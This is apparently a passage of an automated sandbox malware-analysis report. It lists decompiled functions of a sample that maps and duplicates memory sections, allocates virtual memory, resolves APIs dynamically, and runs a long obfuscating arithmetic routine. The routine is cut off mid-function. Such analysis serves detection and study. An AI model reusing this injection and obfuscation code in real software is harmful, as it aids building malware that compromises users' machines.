API String ID: 1546783058-0
Opcode ID: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
Instruction ID: 5655e8303908613cde864c6bbac167efe87e7d1838107c86971bbf59092d50a6
Opcode Fuzzy Hash: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
Instruction Fuzzy Hash: 57513BB0900249BBEB208F95CC48FEF7BB8EF85B00F14416AF911BA2E4D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004017E4 Relevance: 4.7, APIs: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
Instruction ID: 821b0d10a87f8ebea7d35f23d7e2e973144a2f41bdb8f2b8da3a1113d8856595
Opcode Fuzzy Hash: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
Instruction Fuzzy Hash: 7F510773904144EBEB25AA55C844FAB77B5EF91300F28813BE842772F0D63C5A42D75B

Uniqueness

Uniqueness Score: -1.00%

Function 0053003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D

Strings

kernel32.dll, xrefs: 0053008F, 00530095
cess, xrefs: 0053018D

Memory Dump Source

Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_530000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00530E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E

Memory Dump Source

Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_530000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004019F2 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004019F2(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t8;
				char* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t24;

				_t8 = 0x1a3f;
				_push(0x6c);
				_t15 =  *_t21;
				_t22 = _t21 + 4;
				_push(0xad);
				_t17 =  *_t22;
				L004012A4(_t8, _t13, _t15, _t17, _t19, _t20, _t24);
				_t14 = _a4;
				Sleep(0x1388);
				_t9 =  &_v8;
				_push(_t9);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				E00401521(); // executed
				_t25 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t19, _t20, _t25);
				return 0x1a3f;
			}

0x00401a07
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
Instruction ID: 25844bbcf1cbe2862b2fc1e39125094b9f234e696ff082aa1ccfa1e087edcb68
Opcode Fuzzy Hash: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
Instruction Fuzzy Hash: 7301AD3170A205EBEB00AA948D41EBB32299F85314F3404B7BA53B91F1D67D89136F6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0A Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E00401A0A() {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;
				void* _t30;

				asm("adc al, ah");
				_t8 = 0x1a3f;
				_push(0x6c);
				_t16 =  *_t26;
				_t27 = _t26 + 4;
				_push(0xad);
				_t18 =  *_t27;
				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
				_t14 =  *((intOrPtr*)(_t24 + 8));
				Sleep(0x1388);
				_t9 = _t24 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t24 + 0x10)));
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t31 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
				return 0x1a3f;
			}

0x00401a0a
0x00401a07
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
Instruction ID: d8c634ebd0fb47f8dbfc2dcf49b775dfd32c4584f4b3c73897dcc7655f38e994
Opcode Fuzzy Hash: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
Instruction Fuzzy Hash: A6014C3270A205EBDB009A948D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00401A01(void* __ecx) {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t32;

				_t32 = __ecx - 1;
				_t8 = 0x1a3f;
				_push(0x6c);
				_t18 =  *_t28;
				_t29 = _t28 + 4;
				_push(0xad);
				_t20 =  *_t29;
				L004012A4(_t8, _t13, _t18, _t20, _t22, _t24, _t32);
				_t14 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_t9 = _t26 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t33 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t22, _t24, _t33);
				return 0x1a3f;
			}

0x00401a01
0x00401a07
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
Instruction ID: bb8f854860517b91ef23627f573853fa0fc08e5855f63139474b369349933f98
Opcode Fuzzy Hash: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
Instruction Fuzzy Hash: D9015E3170A201EBEB009AD48D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0E Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E00401A0E() {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;
				void* _t30;

				asm("adc ch, bl");
				_push(0x6c);
				_t16 =  *_t26;
				_t27 = _t26 + 4;
				_push(0xad);
				_t18 =  *_t27;
				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
				_t14 =  *((intOrPtr*)(_t24 + 8));
				Sleep(0x1388);
				_t9 = _t24 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t24 + 0x10)));
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t31 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
				return 0x1a3f;
			}

0x00401a0e
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
Instruction ID: 2e2055f9db7f7bfa196961a35f33946421e8fe2f98abc4ca2717ed5341f40e74
Opcode Fuzzy Hash: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
Instruction Fuzzy Hash: C401713170A201EBDB00AAD4CD41BBA32259F86314F2444B7BA53B91F1D67D8913AF2F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0053092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 005309DC, 005309DF, 005309E4
., xrefs: 0053095F
l, xrefs: 00530966

Memory Dump Source

Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_530000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 626030a6da64d2018668b7208c1654a7c64507d178d3c49bd2a1f5fcbc63f1d7
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F93148B6900709DFDB10CF99C884BAEBBF9FF48324F24504AD841AB251D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403428 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

b, xrefs: 00403507

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID: b
API String ID: 0-1908338681
Opcode ID: 64457ab28ea3954589b05a89a8d5ed502d78dd7f7db54dbae28d98d3ce636e54
Instruction ID: 564904199c633e7befa50f4361763fa90495e5dae6f3c10ef61c3106c0b74965
Opcode Fuzzy Hash: 64457ab28ea3954589b05a89a8d5ed502d78dd7f7db54dbae28d98d3ce636e54
Instruction Fuzzy Hash: 8331465194E3C11FD7138B7148585A5BFB48E03215B8C42EBC4E2DF2E3D66D490BC346

Uniqueness

Uniqueness Score: -1.00%

Function 00530D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_530000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: f877ad247cfaf65b2c6095dc76c1e9d33ce4103f6f202f1b3f17c78d83ed0016
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0001A276B007048FDF21DF64C814BAB37E9FB86316F4548A5D90A972C2E774A9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df4ca70348a80a1c5e243a19940bfcb3f583047a3fd2664121538fb861fa3c13
Instruction ID: 94e1fd373f19b4e3f94f7ef0f3e31781e10bf96d0b34e49fc91fe9c03923878a
Opcode Fuzzy Hash: df4ca70348a80a1c5e243a19940bfcb3f583047a3fd2664121538fb861fa3c13
Instruction Fuzzy Hash: 89D0A72A5643024FC231DE344EC64D8BF21EA89624B5D1A58C5512BB66A918B5478561

Uniqueness

Uniqueness Score: -1.00%

Function 00409D43 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00409D69

Part of subcall function 00409B8E: __fltout2.LIBCMT ref: 00409BBA

__cftog_l.LIBCMT ref: 00409D8F
__cftoe_l.LIBCMT ref: 00409DC1

Memory Dump Source

Source File: 00000001.00000002.447770029.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_409000_file.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 7aaf76d984b8bee9c108c0065b9737c736a60a61fa3666d8c25626394b4aeabb
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: D511833244014EBBCF125F85DC41CEE3F62BF59394F588426FA1869172C63BC972AB85

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vgfsabtPID: 3120, Parent PID: 1084COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	15.1%
Signature Coverage:	3.5%
Total number of Nodes:	1609
Total number of Limit Nodes:	23

Executed Functions

Function 00402ADC Relevance: 65.3, APIs: 11, Strings: 26, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402ADC(void* __ebx, void* __edx, void* __ebp, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				long _v352;
				char _v356;
				void* _t1145;
				void* _t1148;
				void* _t1150;
				void* _t1228;
				void* _t1239;

				_t1239 = __fp0;
				_t1150 = __edx;
				if( *0x42e384 == 0x20) {
					WindowFromDC(0);
					FreeEnvironmentStringsA(0);
					GetNumberOfConsoleMouseButtons(0);
					ResetEvent(0);
					EndUpdateResourceW(0, 0);
					GetComputerNameW(0, 0);
					E00403954(_t1148, 0, 0);
					_t1145 = E00403954(_t1148, 0, 0);
					_pop(_t1148);
					_v352 = 0;
					_v356 = 0;
					E004026A0(_t1145, __ebx, _t1148, _t1150);
					st0 = _t1239;
				}
				_t1228 = 0;
				while(1) {
					SetCommMask(0, 0); // executed
					SetLastError(0);
					__imp__GetConsoleAliasW(0, 0, 0, 0);
					if(_t1228 < 0x2481de) {
						_v20 = 0x203525ba;
						_v180 = 0x29672311;
						_v280 = 0x16c17e2f;
						_v160 = 0x4b37d46c;
						_v336 = 0x71be5419;
						_v304 = 0x2a6f2367;
						_v64 = 0x11c0adcd;
						_v152 = 0x3ddf365e;
						_v28 = 0x14911e74;
						_v308 = 0x50ce19d3;
						_v68 = 0x46f869e8;
						_v340 = 0x73e340fc;
						_v80 = 0x1359616b;
						_v76 = 0x656bf717;
						_v348 = 0x4f4a2ff8;
						_v84 = 0x8d23614;
						_v188 = 0x5ed12ef4;
						_v200 = 0x76f0e45a;
						_v140 = 0x2b9e4787;
						_v268 = 0x6871870a;
						_v240 = 0x67b6becb;
						_v48 = 0x703cc4ef;
						_v264 = 0x3a9d68c1;
						_v248 = 0x5eea6a45;
						_v36 = 0x6999b15b;
						_v44 = 0x2c309c02;
						_v276 = 0x14ac6c8f;
						_v40 = 0x7eee8d2e;
						_v144 = 0x547f0d36;
						_v112 = 0x70d291f5;
						_v356 = 0x209b567d;
						_v92 = 0x16da1455;
						_v100 = 0x1ae444cc;
						_v316 = 0x41516c8a;
						_v284 = 0x75a895a4;
						_v196 = 0x15561db7;
						_v272 = 0x3730d9c8;
						_v344 = 0x30ddf634;
						_v136 = 0x7892e542;
						_v148 = 0x5f170584;
						_v156 = 0x33c4e1ea;
						_v208 = 0x592940f0;
						_v324 = 0x25410382;
						_v292 = 0x67c87b5b;
						_v52 = 0x724cb291;
						_v108 = 0x2af6ce75;
						_v204 = 0x5346c5e;
						_v236 = 0x68a67ef7;
						_v216 = 0x7b2ef7dc;
						_v56 = 0x74b593a5;
						_v312 = 0x442ae7f3;
						_v184 = 0x18dee23d;
						_v120 = 0x4a7db4c;
						_v244 = 0x5884e700;
						_v116 = 0x7e8f4c2b;
						_v212 = 0x1027ca35;
						_v60 = 0x6f79f0f4;
						_v224 = 0x32bf6067;
						_v32 = 0x3570696a;
						_v288 = 0x15c8667f;
						_v220 = 0x8717856;
						_v124 = 0x6fcd3c9f;
						_v168 = 0x1bef4f4e;
						_v164 = 0x7e858361;
						_v300 = 0x4e1e64a2;
						_v104 = 0x35510366;
						_v320 = 0xb4a6467;
						_v72 = 0x53bb5cdd;
						_v96 = 0x57bdb0e;
						_v24 = 0x70f6f7ee;
						_v232 = 0x3fc2330c;
						_v328 = 0xc54e702;
						_v176 = 0x7f8ffaab;
						_v252 = 0x74e8996d;
						_v260 = 0x7a2361af;
						_v352 = 0x76ab72d3;
						_v172 = 0x3e506ff;
						_v88 = 0x4b61cfc9;
						_v256 = 0x34de0ea9;
						_v128 = 0x6d4d3170;
						_v228 = 0x232f9bdf;
						_v296 = 0x7089e762;
						_v332 = 0x6a3cdcab;
						_v192 = 0x524caf93;
						_v132 = 0x8c70c07;
						_v20 = _v20 + 0x4d3d3510;
						_v20 = _v20 + 0x135e1da;
						_v20 = _v20 + 0x35180cbe;
						_v20 = _v20 + 0x696d0ef2;
						_v20 = _v20 - 0x4e4a5034;
						_v20 = _v20 + 0x1b72df8b;
						_v20 = _v20 + 0x2c22951d;
						_v180 = _v180 + 0x2bd64939;
						_v64 = _v64 - 0x6da53567;
						_v304 = _v304 - 0x699b0b87;
						_v304 = _v304 + 0x20323dd;
						_v180 = _v180 - 0x16e3b0b6;
						_v336 = _v336 + 0x379dca51;
						_v280 = _v280 - 0x47b51208;
						_v76 = _v76 + 0x492b8f25;
						_v340 = _v340 - 0x69e2e061;
						_v76 = _v76 - 0x12d5d61e;
						_v80 = _v80 + 0x5e29d58;
						_v180 = _v180 + 0xa80e177;
						_v160 = _v160 - 0xf70455;
						_v336 = _v336 - 0x219e6b92;
						_v28 = _v28 - 0x20485ec4;
						_v28 = _v28 + 0x69ace6c8;
						_v308 = _v308 + 0x5a216d35;
						_v180 = _v180 + 0x3f843f47;
						_v308 = _v308 - 0x95cc609;
						_v308 = _v308 + 0x7d3a90d6;
						_v308 = _v308 - 0x73f44647;
						_v152 = _v152 + 0x6a2057fb;
						_v28 = _v28 - 0x52161216;
						_v348 = _v348 + 0x781183f9;
						_v340 = _v340 - 0x3fe7a1ba;
						_v140 = _v140 + 0x364cdd66;
						_v152 = _v152 - 0x2da2fae0;
						_v80 = _v80 - 0x3089ddf6;
						_v340 = _v340 + 0x600f4bd8;
						_v64 = _v64 + 0x6d466040;
						_v336 = _v336 - 0x6da3abc8;
						_v308 = _v308 + 0x366d9f10;
						_v48 = _v48 - 0x1ef2a420;
						_v152 = _v152 - 0x766c1a9e;
						_v28 = _v28 - 0x579729e1;
						_v140 = _v140 - 0x7eab5274;
						_v340 = _v340 + 0x1de85669;
						_v20 = _v20 - 0xbcf4e6e;
						_v308 = _v308 + 0x3d316046;
						_v264 = _v264 - 0x3f906759;
						_v80 = _v80 - 0xeb78cd9;
						_v152 = _v152 + 0x3b85cf27;
						_v268 = _v268 + 0x6693ae15;
						_v76 = _v76 + 0x5f10712f;
						_v240 = _v240 - 0x777dd0d3;
						_v268 = _v268 - 0x607f0eba;
						_v276 = _v276 - 0x65495b43;
						_v140 = _v140 - 0x10ace82b;
						_v348 = _v348 + 0x6e02360d;
						_v248 = _v248 - 0x41f3300a;
						_v44 = _v44 - 0x747dc239;
						_v276 = _v276 - 0x43b4b4c;
						_v76 = _v76 + 0x729b4def;
						_v340 = _v340 - 0xa2bdbda;
						_v340 = _v340 + 0x6f8e2f6a;
						_v336 = _v336 - 0x36e72425;
						_v308 = _v308 + 0x785a2b54;
						_v44 = _v44 - 0x26d04c95;
						_v84 = _v84 + 0x49b7c039;
						_v100 = _v100 - 0x6d199031;
						_v308 = _v308 + 0x2643aac5;
						_v40 = _v40 + 0x6b8f9482;
						_v28 = _v28 - 0x8ae8a90;
						_v160 = _v160 - 0x41898451;
						_v112 = _v112 - 0x7fe90396;
						_v112 = _v112 - 0x8093c62;
						_v144 = _v144 + 0x23975e2e;
						_v356 = _v356 + 0x1589bd55;
						_v76 = _v76 + 0x39c11ed;
						_v84 = _v84 - 0x54345c52;
						_v36 = _v36 + 0x7460d598;
						_v264 = _v264 + 0x4d3daef6;
						_v160 = _v160 - 0x4ea53d47;
						_v64 = _v64 - 0x6dd2bf73;
						_v324 = _v324 - 0x139d206e;
						_v36 = _v36 + 0x7ae2f425;
						_v336 = _v336 - 0x1862274f;
						_v264 = _v264 - 0x491e7eb3;
						_v156 = _v156 - 0x2acc84e8;
						_v36 = _v36 + 0x6122182d;
						_v340 = _v340 - 0x3deb6422;
						_v28 = _v28 + 0x60ec9f16;
						_v236 = _v236 - 0x3d84af5c;
						_v44 = _v44 - 0x1c2c5424;
						_v52 = _v52 - 0x38f9b257;
						_v204 = _v204 + 0x70e625ba;
						_v76 = _v76 + 0x4a9ab101;
						_v28 = _v28 - 0x6ca4d981;
						_v280 = _v280 + 0x7fbf517a;
						_v184 = _v184 + 0x1c88656f;
						_v36 = _v36 + 0x7d47acbf;
						_v188 = _v188 - 0x4100354b;
						_v108 = _v108 - 0x50dbfa28;
						_v304 = _v304 + 0x3f6cf8f7;
						_v76 = _v76 + 0x77e468d6;
						_v280 = _v280 + 0x45366263;
						_v36 = _v36 + 0x3e5018aa;
						_v236 = _v236 + 0x76430e4a;
						_v204 = _v204 - 0x5e97967d;
						_v344 = _v344 - 0x156ad00d;
						_v196 = _v196 + 0x50a85af0;
